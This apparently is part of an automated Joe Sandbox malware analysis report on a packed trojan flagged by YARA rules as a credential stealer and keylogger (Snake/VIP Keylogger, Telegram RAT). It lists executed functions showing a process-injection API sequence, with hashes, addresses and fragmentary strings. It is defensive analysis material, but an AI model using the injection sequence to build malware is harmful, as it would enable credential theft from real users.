Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:54:20
Start date:	25/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	138
Total number of Limit Nodes:	8

Executed Functions

Function 06CA1537 Relevance: 1.8, APIs: 1, Instructions: 270
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06CA1776

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9309c50e52bad3503faba9416f34f64dfd954c9a9cfaf924aea31c54f2745698
Instruction ID: 4d959c805bb3ae7ff464871cb5f21edb6a61cb8a7761c83ea34f70eb7c384d2d
Opcode Fuzzy Hash: 9309c50e52bad3503faba9416f34f64dfd954c9a9cfaf924aea31c54f2745698
Instruction Fuzzy Hash: 7FA16B71D0031A8FEB64DF69C8417DDBBB2EB44314F19856AD818E7240DB749A85CF91

Function 06CA1540 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06CA1776

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 80d5c9731ff34d57e13e2ff321b9e42d412f9911c0ecc7990e4e173b88111ff0
Instruction ID: 48f9f7f98892c4e1764c58db1557333a9890debd7cab6bce33b6aff8262c8108
Opcode Fuzzy Hash: 80d5c9731ff34d57e13e2ff321b9e42d412f9911c0ecc7990e4e173b88111ff0
Instruction Fuzzy Hash: 37915B71D0031A8FEB64DF69C841BDDBBB2FB48314F1985A9E818E7240DB749A85CF91

Function 06CA12B0 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06CA1348

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 13ff24bb59b80a17a1a8f5a4a7ec5a9e4a060763f869a84d41a7378b577b5c53
Instruction ID: fc17a47fb42563c3dfc80f3ad2c2151e027ee69723527c9001ea1fcbbe7f9507
Opcode Fuzzy Hash: 13ff24bb59b80a17a1a8f5a4a7ec5a9e4a060763f869a84d41a7378b577b5c53
Instruction Fuzzy Hash: DD2148B1D013499FDB10CFAAC881BDEBBF5FF48320F54842AE958A7640C7799945CBA0

Function 06CA12B8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06CA1348

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: da24459c026fa9d7c07dedc2715ea43650648e8cdb5be7e156855f4683675387
Instruction ID: 13dde00cf081381d36805b73e80daf173cb37963a23774d0d1430e81d63f8585
Opcode Fuzzy Hash: da24459c026fa9d7c07dedc2715ea43650648e8cdb5be7e156855f4683675387
Instruction Fuzzy Hash: FF2157B1D003099FDB10CFAAC881BDEBBF5FF48320F548429E958A7640C7799941CBA0

Function 06CA1118 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CA119E

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e8ca7de0e7b3e60dde578fb3f38c87a7b132ba224e41f954f518da873e619bfc
Instruction ID: c6104c9dc654307c321f38376bf6055a8616fdc2a3af5d942cff8bdb1603318c
Opcode Fuzzy Hash: e8ca7de0e7b3e60dde578fb3f38c87a7b132ba224e41f954f518da873e619bfc
Instruction Fuzzy Hash: AC2159B1D003098FDB10DFAAC8817EEBBF4EB48214F54842ED559A7240CB789A45CFA4

Function 06CA13A3 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06CA1428

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8bb7b7b0ab5feb4cc60d1d55d91a2ef064d7f64b197b0875d50de79be9309a21
Instruction ID: 8c3d700f0243bb8ec6b425165c20003c915e47480ea3304d7281f9231860776f
Opcode Fuzzy Hash: 8bb7b7b0ab5feb4cc60d1d55d91a2ef064d7f64b197b0875d50de79be9309a21
Instruction Fuzzy Hash: D62116B1C013599FDB10DFAAC881BDEBBF5FF48314F548429E918A7640C7799941CBA4

Function 06CA13A8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06CA1428

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 48e1c77cac1f10a92e663cb059927545ed5c5e9ed40017aeb0d0e5c4748e2bc0
Instruction ID: bef5dcca4022cd49d273120fedf6be9b6b199dcef806ff1ceb280560ac744e20
Opcode Fuzzy Hash: 48e1c77cac1f10a92e663cb059927545ed5c5e9ed40017aeb0d0e5c4748e2bc0
Instruction Fuzzy Hash: E12114B1C003499FDB10DFAAC881BEEBBF5FF48310F54842AE918A7640C7799941CBA4

Function 06CA1120 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CA119E

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4345e3af6f0be984b993804a52e0978f89e09c9bcbc420cc21ba3e44e01301b0
Instruction ID: ccd6407bb2a44d1f0a464bcb77b9931a4a85eef50cd93c4c4d30a2106ef8be1d
Opcode Fuzzy Hash: 4345e3af6f0be984b993804a52e0978f89e09c9bcbc420cc21ba3e44e01301b0
Instruction Fuzzy Hash: 29210775D003098FDB10DFAAC8857AEBBF4AB48214F54842DD559A7640CB789945CFA4

Function 06CA11F3 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06CA1266

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d6aaf2a68a83be56c554b986ef152ac63745ade603d408a07acefe23cb405649
Instruction ID: 50b1a981832816876c764a50363cddc6d2bf8ed3d57cbada7374b3654dc76c96
Opcode Fuzzy Hash: d6aaf2a68a83be56c554b986ef152ac63745ade603d408a07acefe23cb405649
Instruction Fuzzy Hash: 37112676C003499FDB20DFAAC845BDFBBF5EB49324F148419E529A7250CB75A941CFA0

Function 06CA11F8 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06CA1266

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a638b4cee609d340b32dae69627b988a2641ee8f87468739f3bb7c20af0c004a
Instruction ID: d5e2d71d3e9d8d3ff5a83bdaa5593f7e6f276feec051e7b2a72491557e9ef09e
Opcode Fuzzy Hash: a638b4cee609d340b32dae69627b988a2641ee8f87468739f3bb7c20af0c004a
Instruction Fuzzy Hash: 65112675C003499FDB20DFAAC845BDEBBF5EB48320F148419E525A7250CB759940CFA0

Function 06CA1068 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 06CA10D2

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0d40e169c081c0ac7e9daf77deea3097d072b4d70584377b426f8db6657de92e
Instruction ID: c2995add3825933b9867a9e6f6c2ca470713f6755d27d4f5dd305ab6ff43db5e
Opcode Fuzzy Hash: 0d40e169c081c0ac7e9daf77deea3097d072b4d70584377b426f8db6657de92e
Instruction Fuzzy Hash: B5115BB1D003898FDB20DFAAD4457DEFBF4EB88224F14841ED555A7640CA795944CB94

Function 06CA1070 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 06CA10D2

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 93663db09d984e7a69479b7d483883451df2a3976e423092be150601272171ee
Instruction ID: 321edbf815a3afcdd3b937abcea5d735071081085ede4d1378a40e6394cc1e2b
Opcode Fuzzy Hash: 93663db09d984e7a69479b7d483883451df2a3976e423092be150601272171ee
Instruction Fuzzy Hash: AA112871D003498FDB20DFAAC44579EFBF9AB48224F14841AD519A7640CA79A945CBA4

Function 06CA412B Relevance: 1.5, APIs: 1, Instructions: 45
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 06CA418D

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1b0aab9298525953eae69a5bcfe54a5d0ffa26aeecee01e1fe7ccef7b3333bda
Instruction ID: 93d18cfcef0bbb6520386cb7ab56b68b0725ba91859c9d041cfcabb9e85e3166
Opcode Fuzzy Hash: 1b0aab9298525953eae69a5bcfe54a5d0ffa26aeecee01e1fe7ccef7b3333bda
Instruction Fuzzy Hash: 4511D3B5C003499FDB20DF9AD845BDEBBF8EB48324F108419E558B7250C375A944CFA5

Function 06CA4130 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 06CA418D

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0feda47e5f70b65826eb3c84cef8ebedc9b35009843981585e3a3fba6d493a8e
Instruction ID: 993c9d5d161d581d43f0358a77945e201b5536699f71ed1868bdae8f697d0b57
Opcode Fuzzy Hash: 0feda47e5f70b65826eb3c84cef8ebedc9b35009843981585e3a3fba6d493a8e
Instruction Fuzzy Hash: 9611E5B5C003499FDB20DF9AD845BDEFBF8EB48324F108419D518A7250C375A944CFA1

Non-executed Functions

Function 06CA0848 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

d~W7, xrefs: 06CA08A3

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: d~W7
API String ID: 0-2250806414
Opcode ID: 0a76dd62f6120fb1870fe7deec4bb8fd67a7d6acaec5fe8bbbbb354fa6685692
Instruction ID: b8cf0e7cacb0ce3cb6f1aa89195dcf12878e0462e77ae6f1076db512e742d820
Opcode Fuzzy Hash: 0a76dd62f6120fb1870fe7deec4bb8fd67a7d6acaec5fe8bbbbb354fa6685692
Instruction Fuzzy Hash: 5BE1D974E0021A8FDB14DFA9C580AAEFBF2BF89308F248169D455AB359D730AD41CF61

Function 06CA5D08 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731f3aea245d031020fe8fc96edf3b8f5992d04643c1709c749a41b1a876913a
Instruction ID: e19d1f02699f93f3087c98151d97fb8fd62d94d6654b007d2b22d5b7a07b0b43
Opcode Fuzzy Hash: 731f3aea245d031020fe8fc96edf3b8f5992d04643c1709c749a41b1a876913a
Instruction Fuzzy Hash: 81D19C31B003418FEB55DB76C4507AEB7F6AF89308F5484ADD1568B391DB34E901CB92

Analysis Process: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exePID: 7600, Parent PID: 7412COMMON

Execution Graph

Execution Coverage:	18.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.3%
Total number of Nodes:	30
Total number of Limit Nodes:	7

Executed Functions

Function 01699DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

(oq, xrefs: 0169A518
4'q, xrefs: 01699E04
4'q, xrefs: 0169AB13
4'q, xrefs: 01699F0C

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (oq$4'q$4'q$4'q
API String ID: 0-2528434116
Opcode ID: 08689cee5e193b7aa44f8c620d773687baf4d95c906a83b2cc51d77766db3050
Instruction ID: 18b36f4565540114df229ad2feaaedf742fab8c16cfacf7e47a947744e0d7eaf
Opcode Fuzzy Hash: 08689cee5e193b7aa44f8c620d773687baf4d95c906a83b2cc51d77766db3050
Instruction Fuzzy Hash: 87A26E70A002098FCF15CFA8C984AAEBBFABF88314F15855AE905DB365D735ED41CB91

Function 01696FC8 Relevance: 5.5, Strings: 4, Instructions: 485
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 01697212
(oq, xrefs: 01697220
,q, xrefs: 0169728A
,q, xrefs: 01697298

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q
API String ID: 0-620556200
Opcode ID: d5976deec03e48e3ddc16382d79445964e9a22a531223dd6927b8f2e000ae6f3
Instruction ID: 207f3b32e2d9c3092dee9137f4ec4fba5987d294659241a345785d86aa92cd59
Opcode Fuzzy Hash: d5976deec03e48e3ddc16382d79445964e9a22a531223dd6927b8f2e000ae6f3
Instruction Fuzzy Hash: 16125C70A11209DFDF15CF69C884AADBBBABF48314F19806AE905AB361DB35ED41CF50

Function 016929EC Relevance: 5.3, Strings: 4, Instructions: 319
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xq, xrefs: 01692A9E
Xq, xrefs: 01692AD8
Xq, xrefs: 01692B57
Xq, xrefs: 01692BA4

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 148311d1755092b66ee558b8be00f658742248c5cf909c0fbe79e2355d7e79bc
Instruction ID: b35737c1ab589c5b20f8232d7175e6660b29bd95fe6c180d80caca951365ad60
Opcode Fuzzy Hash: 148311d1755092b66ee558b8be00f658742248c5cf909c0fbe79e2355d7e79bc
Instruction Fuzzy Hash: 23C1C1319053599BCF2ACF78CDA1A5ABFFDFB89208F14559EC4059B361C7369902CB81

Function 06DB9548 Relevance: 3.4, APIs: 2, Instructions: 357
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DB95E0

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: acabc061b7b8731ba21036dab6c776f77038da0ad7d8c623963d2b8efb7b297d
Instruction ID: 147e9a4aa421b184b8d9f1d46bc7199d998b8a5cf614321c4c6f9c2780aba80a
Opcode Fuzzy Hash: acabc061b7b8731ba21036dab6c776f77038da0ad7d8c623963d2b8efb7b297d
Instruction Fuzzy Hash: 12F1F174E00258CFEB54DFA9C884B9DBBF2BF89304F5481A9D809AB395DB709985CF50

Function 016969A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

(oq, xrefs: 01696EDA
Hq, xrefs: 01696DA6

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (oq$Hq
API String ID: 0-2917151738
Opcode ID: 17ef629f7c3537d99257333a03d3f3d45862e97983c6064bd64fa29eccbf4e56
Instruction ID: 50ae92f15cc745a5812f4c921375d66d55ff5a8de726530c9b43e35844efff81
Opcode Fuzzy Hash: 17ef629f7c3537d99257333a03d3f3d45862e97983c6064bd64fa29eccbf4e56
Instruction Fuzzy Hash: 64128D71A002198FDB15DF69D854BAEBBF6FF88300F148569E80ADB395DB349D42CB90

Function 01693E09 Relevance: 2.8, Strings: 2, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xq, xrefs: 01693E47
$q, xrefs: 01693E2E

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Xq$$q
API String ID: 0-855381642
Opcode ID: d6ed73b83a01f617a8caa077e2b9991ba97d23030c65fa5efcc71c4e19e5c5b6
Instruction ID: 917bfd3e2949f744e95e8f05ada566187843cd0d40870ca6457f544f9a6e1e28
Opcode Fuzzy Hash: d6ed73b83a01f617a8caa077e2b9991ba97d23030c65fa5efcc71c4e19e5c5b6
Instruction Fuzzy Hash: 46918230B04219DFDF19EBB5996427E7BA7BFC8301B05852EE406DB398CE3988038795

Function 0169C147 Relevance: 2.7, Strings: 2, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0169C3EF
PHq, xrefs: 0169C400

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 3a73b2b567298d68ffe06c95180a6a68c5bb7ed3e9745dd5598c13c5ab7e5af9
Instruction ID: 6d4e261a9542bd9d90f7b7ac80864785ac28219e56a2d454e058b4172e31d66c
Opcode Fuzzy Hash: 3a73b2b567298d68ffe06c95180a6a68c5bb7ed3e9745dd5598c13c5ab7e5af9
Instruction Fuzzy Hash: 07A1C675E00218CFEB14CFAAD984A9DBBF6BF89310F14806AE409AB361DB319941CF55

Function 01695362 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 016955C8
PHq, xrefs: 016955D9

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 26cd79b1e6555928689a7876d7648e8036ff4b18263a8acd64fd19d09aff0877
Instruction ID: f86f1ec00bb2bcdf1f14e6349e0301b426a0aad7220de5d76d16e6659c6f5492
Opcode Fuzzy Hash: 26cd79b1e6555928689a7876d7648e8036ff4b18263a8acd64fd19d09aff0877
Instruction Fuzzy Hash: 0391C274E00218CFDF15CFAAD984A9DBBF2BF89310F14806AE809AB365DB319945CF51

Function 0169D278 Relevance: 2.7, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0169D4E0
PHq, xrefs: 0169D4CF

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: b7ebedc6b9fa07bd7deef7d43009c9b95bcbaab68f165382449b505433a12391
Instruction ID: 36ebf704571c6612f0dfe2e53ab6342c29609e3bf83a3d23fb3da05d58389759
Opcode Fuzzy Hash: b7ebedc6b9fa07bd7deef7d43009c9b95bcbaab68f165382449b505433a12391
Instruction Fuzzy Hash: F781A074E01218CFEB14DFAAD984A9DBBF2BF89300F14D069E819AB365DB309945CF51

Function 0169CA08 Relevance: 2.7, Strings: 2, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0169CC5F
PHq, xrefs: 0169CC70

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 9f07d5763564249688cd2ea9d2726d1dfcc50e90e518939f214ba44d348a70fa
Instruction ID: 4e9cf56c6f6a28cc59e0a79b92dac9bf21abc8be4a3acf8e365372495d88d5ba
Opcode Fuzzy Hash: 9f07d5763564249688cd2ea9d2726d1dfcc50e90e518939f214ba44d348a70fa
Instruction Fuzzy Hash: 53819274E00258CFEF14DFAAD984A9DBBF6BF89310F148069E419AB365DB309942CF51

Function 0169CCD8 Relevance: 2.7, Strings: 2, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0169CF2F
PHq, xrefs: 0169CF40

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 933a7e16340df0227bcd72b641ecaf6fe2730214378b30346213a9e61eef6202
Instruction ID: 3f3d0715d2336c9191142356e2007658dd0f764c8e4823217efe48301e352f89
Opcode Fuzzy Hash: 933a7e16340df0227bcd72b641ecaf6fe2730214378b30346213a9e61eef6202
Instruction Fuzzy Hash: 54819174E00218DFEB14DFAAD984A9DBBF2BF89300F14C069E419AB365DB309946CF51

Function 0169CFAA Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PHq, xrefs: 0169D1FF
PHq, xrefs: 0169D210

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 4981c0e87f57bfdde1e591e81b594702f7965892e198a40bd647410df0c8fa27
Instruction ID: b8740412e5747fdc397999a8b154cb50f99763da23956ce62e2b3b25a663d40a
Opcode Fuzzy Hash: 4981c0e87f57bfdde1e591e81b594702f7965892e198a40bd647410df0c8fa27
Instruction Fuzzy Hash: 7A81A274E00218DFEF14DFAAD984A9DBBF6BF89311F148069E409AB365DB309942CF11

Function 0169C738 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

PHq, xrefs: 0169C98F
PHq, xrefs: 0169C9A0

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 6a45f3663b2baaf9b2cc08aa64a69b8133d2b266aa5577ca9074b8e55d8538d1
Instruction ID: fcefa5c2b70f29087dc415134d4ec2c0fe05dcb1137fa69d5c7fe4ba19e1b306
Opcode Fuzzy Hash: 6a45f3663b2baaf9b2cc08aa64a69b8133d2b266aa5577ca9074b8e55d8538d1
